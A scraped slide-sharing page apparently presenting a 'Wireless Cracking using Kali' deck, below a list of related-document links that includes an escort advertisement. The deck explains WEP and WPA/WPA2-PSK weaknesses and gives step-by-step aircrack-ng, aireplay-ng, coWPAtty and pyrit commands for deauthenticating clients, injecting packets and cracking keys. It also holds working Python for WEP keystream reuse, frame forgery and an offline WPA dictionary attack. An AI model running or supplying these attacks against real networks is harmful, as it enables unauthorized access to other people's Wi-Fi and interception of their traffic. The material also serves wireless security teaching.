social pharmacy d-pharm 1st year by Pragati K. Mahajanpragatimahajan3
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...PsychoTech Services
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingTeacherCyreneCayanan
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 

Dernier (20)

Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx

Wireless Cracking using Kali

WEP Weakness
• The IV is only 24 bits, so the per-packet RC4 key IV||K must repeat after at most 2^24 (~16.7 million) packets; in practice a collision comes much sooner (birthday bound, and many drivers restart the IV counter at zero on reset)
• The IV is sent in clear text, so an attacker can see exactly which packets share a keystream; two packets with the same IV XOR to the XOR of their plaintexts
• CRC-32 is linear, not a cryptographic MAC: an attacker can flip chosen bits in the ciphertext and adjust the encrypted ICV so the frame still verifies, without knowing the key
• Because the key stream depends on IV||K and the IV is known, some IVs leak bytes of K (FMS/KoreK/PTW), which is what aircrack-ng exploits when it recovers the key from captured IVs
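The following Python is an added example, not code from the slides: it builds WEP frames exactly as described above (IV in the clear, RC4 keyed with IV||K over data||CRC-32 ICV) and then carries out the two attacks the weaknesses allow, reading a second frame that reused an IV once one plaintext is known, and flipping bits in a frame while fixing up the encrypted ICV. The key, IV and frame contents are constructed for the demonstration.

```python
"""WEP frame construction plus two attacks that follow from its design:
keystream reuse when an IV repeats, and ICV forgery because CRC-32 is linear.
Added example for this page; the key, IV and frames below are constructed."""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP keys it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, in the clear) || RC4(IV||key, plaintext || ICV)."""
    assert len(iv) == 3
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok) the way a receiver would see it."""
    iv, body = frame[:3], frame[3:]
    pt = rc4(iv + key, body)
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext for one frame yields the keystream for its IV: as many
    bytes as we know plus the 4 ICV bytes, which we can compute ourselves."""
    pt = known_plaintext + icv(known_plaintext)
    return bytes(c ^ p for c, p in zip(frame[3:], pt))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypts another frame that reused the same IV; no key needed."""
    body = frame[3:]
    n = min(len(body), len(keystream))
    pt = bytes(c ^ k for c, k in zip(body[:n], keystream[:n]))
    return pt[:-4] if n == len(body) else pt  # drop the ICV once it is fully covered


def forge(frame: bytes, delta: bytes) -> bytes:
    """Flip the plaintext bits selected by `delta` without knowing the key.
    CRC-32 is affine: crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros of same length),
    so the required ICV change depends only on delta and can be applied
    under the keystream by XORing it into the ciphertext."""
    assert len(delta) == len(frame) - 3 - 4
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    mask = delta + struct.pack("<I", icv_delta & 0xFFFFFFFF)
    return frame[:3] + bytes(c ^ m for c, m in zip(frame[3:], mask))


def demo() -> dict:
    key = bytes.fromhex("0123456789")      # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                    # reused IV: drivers often count up from 0
    p1 = b"GET /index.html HTTP/1.0"        # frame whose plaintext is easy to guess
    p2 = b"admin:s3cret"                    # frame we actually want to read
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)           # same IV, same keystream
    keystream = recover_keystream(f1, p1)
    target = b"PUT" + p1[3:]                # change the HTTP method in f1
    delta = bytes(a ^ b for a, b in zip(p1, target))
    return {
        "reused_iv_plaintext": decrypt_with_keystream(f2, keystream),
        "forged": wep_decrypt(key, forge(f1, delta)),  # (target, True)
    }


if __name__ == "__main__":
    print(demo())
```

The forgery is why the slide's "CRC-32 is not cryptographically secure" matters in practice: the receiver's ICV check passes on the modified frame, so an attacker can redirect or alter traffic without ever recovering the key.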
WEP Cracking
1. Start monitor mode: airmon-ng start wlan0 (older airmon-ng creates mon0; current versions create wlan0mon, so use whichever name it prints in the steps below)
2. Identify the target BSSID, SSID and channel with airodump-ng: airodump-ng mon0
3. Lock the monitor interface to the target channel: iwconfig mon0 channel <no>
4. Capture packets with airodump-ng: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0 (a count of 0 sends deauths until stopped; a small count such as -0 5 is normally enough to make clients reconnect and emit ARP traffic)
6. Send deauth packets to a specific client: aireplay-ng -0 0 -a <BSSID> -c <MAC of associated client> mon0
7. Fake authentication, so the AP accepts injected frames from our MAC: aireplay-ng -1 0 -e <SSID> -a <BSSID> -h <attacker MAC / spoofed MAC> mon0
8. Generate data packets, and with them fresh IVs, by ARP replay: aireplay-ng -3 -b <BSSID> -h <attacker MAC / connected client MAC> mon0
9. Crack: aircrack-ng <file.cap> (the PTW attack typically needs tens of thousands of unique IVs; aircrack-ng keeps retrying as the capture file grows)
WEP Packet Decrypting
1. airdecap-ng -w <WEP key in hex, as printed by aircrack-ng> <captured_file.cap>
2. The decrypted frames are written to captured_file-dec.cap
3. Open captured_file-dec.cap in Wireshark
WPA/WPA2
• WPA uses the TKIP encryption algorithm (still RC4 underneath, designed to run on WEP hardware)
• WPA2 mandates support for AES-CCMP; TKIP may still be allowed alongside it for compatibility
• WPA and WPA2 support PSK (personal) and EAP-based (enterprise, 802.1X) authentication
• WPA/WPA2-PSK is vulnerable to an offline dictionary attack once a 4-way handshake has been captured, because everything in the handshake except the passphrase is sent in the clear
WPA/WPA2 4-Way Handshake
(the original slide shows a diagram of the four messages between client and AP)
• Both client and AP derive the Pairwise Master Key (PMK)
• With a PSK, the PMK is derived from the passphrase and the SSID, which acts as salt, with PBKDF2-HMAC-SHA1 over 4096 iterations, giving a 256-bit key; the same passphrase on a different SSID gives a different PMK
• Message 1: the AP sends a pseudo-randomly generated ANonce to the client
• The client generates its own pseudo-random SNonce
• The client derives the Pairwise Transient Key (PTK) from the PMK, the ANonce, the SNonce, the AP's MAC address and its own MAC address; the PTK is 512 bits (64 bytes) for TKIP and 384 bits for CCMP, and its first 128 bits are the Key Confirmation Key (KCK) used to authenticate the handshake messages
• Message 2: the client sends its SNonce and a MIC (message integrity code, computed with the KCK over the EAPOL-Key frame) to the AP
• The AP derives the PTK from the same five inputs and compares its own MIC with the one the client sent; a match proves the client knows the PMK
• Message 3: if the MICs match, the AP sends its ANonce again, authenticated with a MIC and carrying the encrypted group key, and instructs the client to install the keys; message 4 is the client's acknowledgement
• An attacker who captures messages 1 and 2 (or 2 and 3) has every input to the MIC except the PMK, which is what a dictionary attack guesses
WPA/WPA2 Cracking
1. Start monitor mode: airmon-ng start wlan0 (the monitor interface mon0 is the result of this step, not its input)
2. Identify the target BSSID, SSID and channel with airodump-ng: airodump-ng mon0
3. Lock the monitor interface to the target channel: iwconfig mon0 channel <no>
4. Capture packets with airodump-ng: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5. Broadcast deauth packets so a connected client reconnects and performs a new 4-way handshake: aireplay-ng -0 0 -a <BSSID> mon0 (airodump-ng shows "WPA handshake: <BSSID>" in its top line once it has captured one; a count of 0 deauths until stopped, which can keep kicking the client before the handshake completes, so a small count such as -0 5 is usually better)
6. Crack: aircrack-ng -w <password file> <file.cap> (this runs entirely offline against the captured handshake; it only succeeds if the passphrase is in the word list)
Speeding up WPA/WPA2-PSK cracking with precomputed PMKs
• The expensive step is PBKDF2 (4096 HMAC-SHA1 rounds per candidate); the PMK depends only on the passphrase and the SSID, so it can be computed once per SSID and reused against every handshake captured for that SSID (a table is useless for any other SSID)
• Generate PMKs with genpmk (from coWPAtty): genpmk -f <password file> -d <output file> -s "SSID"
• Crack with coWPAtty using the table: cowpatty -d <pmkfile> -s "SSID" -r <captured file>
• Crack with pyrit using the table: pyrit -r <captured file> -i <pmk file> attack_cowpatty
Speeding up WPA/WPA2-PSK cracking with pyrit's database
• Import passwords into pyrit: pyrit -i <password file> import_passwords
• Create the ESSID in pyrit: pyrit -e <ssid> create_essid
• Generate PMKs for every (ESSID, password) pair: pyrit batch
• Crack using the stored PMKs: pyrit -r <captured file> attack_db
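To show the handshake derivation and the attack it enables end to end, here is an added Python example (not from the slides or the aircrack-ng/coWPAtty/pyrit projects): it derives the PMK and PTK as the handshake description above specifies, computes the message 2 MIC the way a legitimate client would, and then runs the offline dictionary attack against that captured message, once computing PBKDF2 per candidate and once from a precomputed PMK table, which is what genpmk and pyrit batch produce. The SSID, passphrase, MAC addresses, nonces and the EAPOL-Key frame are all constructed; the EAPOL-Key layout (MIC at offset 81) and the key-info bits follow 802.11i.

```python
"""WPA/WPA2-PSK 4-way handshake key derivation and the offline dictionary
attack it enables. Added example for this page; SSID, passphrase, MACs,
nonces and the EAPOL message 2 frame are constructed."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key descriptor before the MIC
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes, length: int = 64) -> bytes:
    """PTK = PRF-X(PMK, "Pairwise key expansion",
                   min(MACs) || max(MACs) || min(nonces) || max(nonces)).
    64 bytes for TKIP, 48 for CCMP; the first 16 bytes are the KCK used for the MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range((length + 19) // 20):          # 20-byte SHA-1 blocks until enough
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:length]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_descriptor_version: int = 2) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(MIC_LEN) + eapol_frame[MIC_OFFSET + MIC_LEN:]
    if key_descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_m2(snonce: bytes, mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, key info pairwise|MIC|version 2, no key data)."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: MIC (0x0100) | pairwise (0x0008) | version 2
            + b"\x00\x10"                 # key length: 16
            + struct.pack(">Q", 1)        # replay counter
            + snonce                      # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID (unused in message 2)
            + mic
            + b"\x00\x00")                # key data length: 0
    return b"\x02\x03" + struct.pack(">H", len(body)) + body   # EAPOL v2, type 3 = EAPOL-Key


def precompute_pmks(ssid: str, wordlist) -> dict:
    """The genpmk / pyrit batch idea: PBKDF2 depends only on (passphrase, SSID)."""
    return {w: derive_pmk(w, ssid) for w in wordlist}


def crack(ssid, ap_mac, client_mac, anonce, snonce, eapol_m2, wordlist, pmk_table=None):
    """Offline dictionary attack: every MIC input except the PMK is in the capture."""
    captured_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_table[candidate] if pmk_table else derive_pmk(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return candidate
    return None


def demo() -> dict:
    ssid, passphrase = "HomeNet", "sunshine2014"          # constructed
    ap_mac = bytes.fromhex("020000000001")                # locally administered, constructed
    client_mac = bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # fixed "random" nonces
    # Legitimate client: derive the PTK and put a real MIC on message 2
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    m2 = build_eapol_m2(snonce)
    m2 = m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + MIC_LEN:]
    # Attacker: has ANonce (message 1), SNonce and MIC (message 2), both MACs and the SSID
    wordlist = ["password", "letmein", "sunshine2014", "qwerty123"]
    table = precompute_pmks(ssid, wordlist)
    return {
        "direct": crack(ssid, ap_mac, client_mac, anonce, snonce, m2, wordlist),
        "with_table": crack(ssid, ap_mac, client_mac, anonce, snonce, m2, wordlist, table),
        "wrong_ssid": crack("OtherNet", ap_mac, client_mac, anonce, snonce, m2, wordlist),
    }


if __name__ == "__main__":
    print(demo())
```

The "wrong_ssid" case is the practical limit of precomputation: a PMK table built for one SSID cannot find the passphrase for another, which is why genpmk and pyrit both take the SSID as input.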
Password File
• crunch <min> <max> <charset> -t <pattern> (in the pattern, each @ is replaced by a character from the charset and every other character is kept fixed)
• Ex: crunch 10 10 1234567890 -t 98767@@@@@ generates every 10-digit string starting with 98767 (100,000 candidates), for example to target phone-number style passphrases